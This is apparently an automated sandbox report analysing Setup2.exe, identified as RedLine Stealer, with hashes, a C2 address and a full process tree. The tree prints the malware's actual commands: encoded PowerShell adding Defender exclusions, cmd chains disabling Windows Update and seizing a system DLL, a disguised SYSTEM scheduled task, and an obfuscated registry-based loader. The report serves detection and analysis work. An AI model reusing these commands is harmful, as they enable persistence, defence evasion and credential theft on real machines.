Analysis

  • max time kernel
    151s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    30-08-2022 13:40

General

  • Target

    Setup2.exe

  • Size

    4.5MB

  • MD5

    7ede5e1864c423c59a1cb3bdcd7cc939

  • SHA1

    f34f722ed04615441656ccef087e7b982ae09af9

  • SHA256

    4754c64162263a12327a42ebcd023e7d0aaae400d02915c1c0ea972ce994842d

  • SHA512

    47350800da01d48c6c5ae1a7132bb3f9ed1a247fefbd153b4ec890fd1946a5812ae901f18b775dcc30deeb61e712f42436fcee1ba642ed1b8086517b81c9c95b

  • SSDEEP

    98304:dN1vJXa7MqmTWoYNag+r2UFKl2PjXvp0rcqh2MqnPs17EwoIsuimtRc:dLJXa7WTZrjPjxCh8M7VoJuicRc

Malware Config

Extracted

Family

redline

C2

185.200.191.18:80

Attributes
  • auth_value

    a11ae941038a2a4398d552996dbd03f1

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 48 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:476
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:460
        • C:\Windows\System32\spoolsv.exe
          C:\Windows\System32\spoolsv.exe
          2⤵
            PID:284
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
            2⤵
              PID:1828
            • C:\Windows\system32\sppsvc.exe
              C:\Windows\system32\sppsvc.exe
              2⤵
                PID:1960
              • C:\Windows\system32\taskhost.exe
                "taskhost.exe"
                2⤵
                  PID:1136
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                  2⤵
                    PID:1056
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k NetworkService
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:292
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Drops file in Windows directory
                    • Suspicious use of AdjustPrivilegeToken
                    PID:872
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {9E461821-0614-41BD-842F-E4E0C24B0DE1} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                      • Loads dropped DLL
                      PID:324
                      • C:\Program Files\Google\Chrome\updater.exe
                        "C:\Program Files\Google\Chrome\updater.exe"
                        4⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:568
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAB2AHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdAB5AGsAIwA+AA=="
                          5⤵
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1628
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                          5⤵
                            PID:168380
                            • C:\Windows\system32\sc.exe
                              sc stop UsoSvc
                              6⤵
                              • Launches sc.exe
                              PID:168400
                            • C:\Windows\system32\sc.exe
                              sc stop WaaSMedicSvc
                              6⤵
                              • Launches sc.exe
                              PID:168564
                            • C:\Windows\system32\sc.exe
                              sc stop wuauserv
                              6⤵
                              • Launches sc.exe
                              PID:1920
                            • C:\Windows\system32\sc.exe
                              sc stop bits
                              6⤵
                              • Launches sc.exe
                              PID:168748
                            • C:\Windows\system32\sc.exe
                              sc stop dosvc
                              6⤵
                              • Launches sc.exe
                              PID:168836
                            • C:\Windows\system32\reg.exe
                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                              6⤵
                              • Modifies registry key
                              PID:168348
                            • C:\Windows\system32\reg.exe
                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                              6⤵
                              • Modifies registry key
                              PID:168588
                            • C:\Windows\system32\reg.exe
                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                              6⤵
                              • Modifies registry key
                              PID:168676
                            • C:\Windows\system32\reg.exe
                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                              6⤵
                              • Modifies registry key
                              PID:1768
                            • C:\Windows\system32\reg.exe
                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                              6⤵
                              • Modifies registry key
                              PID:168476
                            • C:\Windows\system32\takeown.exe
                              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                              6⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:168832
                            • C:\Windows\system32\icacls.exe
                              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                              6⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:168888
                            • C:\Windows\system32\reg.exe
                              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                              6⤵
                              • Modifies registry key
                              PID:168496
                            • C:\Windows\system32\reg.exe
                              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                              6⤵
                              • Modifies registry key
                              PID:1924
                            • C:\Windows\system32\reg.exe
                              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                              6⤵
                              • Modifies registry key
                              PID:168632
                            • C:\Windows\system32\reg.exe
                              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                              6⤵
                              • Modifies registry key
                              PID:168900
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                              6⤵
                                PID:168604
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                6⤵
                                  PID:1716
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                  6⤵
                                    PID:168784
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                    6⤵
                                      PID:168356
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                      6⤵
                                        PID:1348
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                        6⤵
                                          PID:1036
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                          6⤵
                                            PID:1824
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                          5⤵
                                            PID:168444
                                            • C:\Windows\system32\powercfg.exe
                                              powercfg /x -hibernate-timeout-ac 0
                                              6⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:168544
                                            • C:\Windows\system32\powercfg.exe
                                              powercfg /x -hibernate-timeout-dc 0
                                              6⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:168576
                                            • C:\Windows\system32\powercfg.exe
                                              powercfg /x -standby-timeout-ac 0
                                              6⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:168428
                                            • C:\Windows\system32\powercfg.exe
                                              powercfg /x -standby-timeout-dc 0
                                              6⤵
                                                PID:168472
                                            • C:\Windows\System32\dialer.exe
                                              C:\Windows\System32\dialer.exe "ahqffhzbijamz"
                                              5⤵
                                                PID:168336
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                              4⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1000
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                              4⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:932
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService
                                          2⤵
                                            PID:836
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                                            2⤵
                                              PID:808
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                              2⤵
                                              • Drops file in System32 directory
                                              PID:748
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k RPCSS
                                              2⤵
                                                PID:672
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k DcomLaunch
                                                2⤵
                                                  PID:596
                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    3⤵
                                                      PID:168696
                                                • C:\Windows\system32\winlogon.exe
                                                  winlogon.exe
                                                  1⤵
                                                    PID:416
                                                    • C:\Windows\System32\dllhost.exe
                                                      C:\Windows\System32\dllhost.exe /Processid:{8fc2c8c3-5926-4f7d-8b5c-db0e54dfc18d}
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1588
                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                      C:\Windows\SysWOW64\dllhost.exe /Processid:{94ad35fc-6dcb-4f1a-b99b-613ee779ce6b}
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:168460
                                                  • C:\Windows\system32\lsm.exe
                                                    C:\Windows\system32\lsm.exe
                                                    1⤵
                                                      PID:484
                                                    • \\?\C:\Windows\system32\wbem\WMIADAP.EXE
                                                      wmiadap.exe /F /T /R
                                                      1⤵
                                                        PID:848
                                                      • C:\Windows\Explorer.EXE
                                                        C:\Windows\Explorer.EXE
                                                        1⤵
                                                          PID:1268
                                                          • C:\Users\Admin\AppData\Local\Temp\Setup2.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Setup2.exe"
                                                            2⤵
                                                            • Drops file in Drivers directory
                                                            • Suspicious use of SetThreadContext
                                                            • Drops file in Program Files directory
                                                            • Modifies system certificate store
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1896
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAB2AHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdAB5AGsAIwA+AA=="
                                                              3⤵
                                                              • Drops file in System32 directory
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1176
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                              3⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:764
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop UsoSvc
                                                                4⤵
                                                                • Launches sc.exe
                                                                PID:336
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop WaaSMedicSvc
                                                                4⤵
                                                                • Launches sc.exe
                                                                PID:532
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop wuauserv
                                                                4⤵
                                                                • Launches sc.exe
                                                                PID:1924
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop bits
                                                                4⤵
                                                                • Launches sc.exe
                                                                PID:112
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop dosvc
                                                                4⤵
                                                                • Launches sc.exe
                                                                PID:1556
                                                              • C:\Windows\system32\reg.exe
                                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                                4⤵
                                                                • Modifies registry key
                                                                PID:1816
                                                              • C:\Windows\system32\reg.exe
                                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                                4⤵
                                                                • Modifies registry key
                                                                PID:1912
                                                              • C:\Windows\system32\reg.exe
                                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                                4⤵
                                                                • Modifies security service
                                                                • Modifies registry key
                                                                PID:1388
                                                              • C:\Windows\system32\reg.exe
                                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                                4⤵
                                                                • Modifies registry key
                                                                PID:1260
                                                              • C:\Windows\system32\reg.exe
                                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                                4⤵
                                                                • Modifies registry key
                                                                PID:584
                                                              • C:\Windows\system32\takeown.exe
                                                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                                4⤵
                                                                • Possible privilege escalation attempt
                                                                • Modifies file permissions
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:452
                                                              • C:\Windows\system32\icacls.exe
                                                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                                4⤵
                                                                • Possible privilege escalation attempt
                                                                • Modifies file permissions
                                                                PID:824
                                                              • C:\Windows\system32\reg.exe
                                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                                4⤵
                                                                • Modifies registry key
                                                                PID:1280
                                                              • C:\Windows\system32\reg.exe
                                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                                4⤵
                                                                • Modifies registry key
                                                                PID:984
                                                              • C:\Windows\system32\reg.exe
                                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                                4⤵
                                                                • Modifies registry key
                                                                PID:1660
                                                              • C:\Windows\system32\reg.exe
                                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                                4⤵
                                                                • Modifies registry key
                                                                PID:1488
                                                              • C:\Windows\system32\schtasks.exe
                                                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                                4⤵
                                                                  PID:1764
                                                                • C:\Windows\system32\schtasks.exe
                                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                                  4⤵
                                                                    PID:304
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                                    4⤵
                                                                      PID:1676
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                                      4⤵
                                                                        PID:552
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                                        4⤵
                                                                          PID:1804
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                                          4⤵
                                                                            PID:1600
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                            4⤵
                                                                              PID:2040
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                            3⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:268
                                                                            • C:\Windows\system32\powercfg.exe
                                                                              powercfg /x -hibernate-timeout-ac 0
                                                                              4⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1020
                                                                            • C:\Windows\system32\powercfg.exe
                                                                              powercfg /x -hibernate-timeout-dc 0
                                                                              4⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1072
                                                                            • C:\Windows\system32\powercfg.exe
                                                                              powercfg /x -standby-timeout-ac 0
                                                                              4⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1068
                                                                            • C:\Windows\system32\powercfg.exe
                                                                              powercfg /x -standby-timeout-dc 0
                                                                              4⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:856
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgByACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAdABlAG0AcAAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHQAZQBtAHAALgBlAHgAZQAnACkAIAA8ACMAcQB3AHUAIwA+AA=="
                                                                            3⤵
                                                                            • Drops file in System32 directory
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1768
                                                                            • C:\Users\Admin\AppData\Local\Temp\temp.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\temp.exe"
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              • Modifies system certificate store
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1792
                                                                              • C:\Users\Admin\AppData\Local\Temp\cmd.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\cmd.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:1280
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                  6⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:168328
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 166608
                                                                                  6⤵
                                                                                  • Loads dropped DLL
                                                                                  • Program crash
                                                                                  PID:168408
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "temp.exe"
                                                                                5⤵
                                                                                  PID:164652
                                                                                  • C:\Windows\system32\choice.exe
                                                                                    choice /C Y /N /D Y /T 5
                                                                                    6⤵
                                                                                      PID:168372
                                                                              • C:\Windows\System32\conhost.exe
                                                                                C:\Windows\System32\conhost.exe
                                                                                3⤵
                                                                                • Drops file in Windows directory
                                                                                PID:972
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                                                                                3⤵
                                                                                  PID:520
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                                                                                    4⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:452
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                                                                  3⤵
                                                                                    PID:1440
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                                                                      4⤵
                                                                                        PID:1488
                                                                                • C:\Windows\system32\Dwm.exe
                                                                                  "C:\Windows\system32\Dwm.exe"
                                                                                  1⤵
                                                                                    PID:1232
                                                                                  • C:\Windows\system32\conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe "485958907-766256497-424201914-1389973767105906324412017678218444066971556702938"
                                                                                    1⤵
                                                                                      PID:1524
                                                                                    • C:\Windows\system32\conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe "1594856442-1593862860-507866125765907161677168209115057963019532011982113678461"
                                                                                      1⤵
